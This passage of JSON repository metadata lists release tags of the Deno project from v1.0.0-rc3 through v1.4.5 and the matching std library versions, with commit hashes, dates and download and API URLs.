enoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","d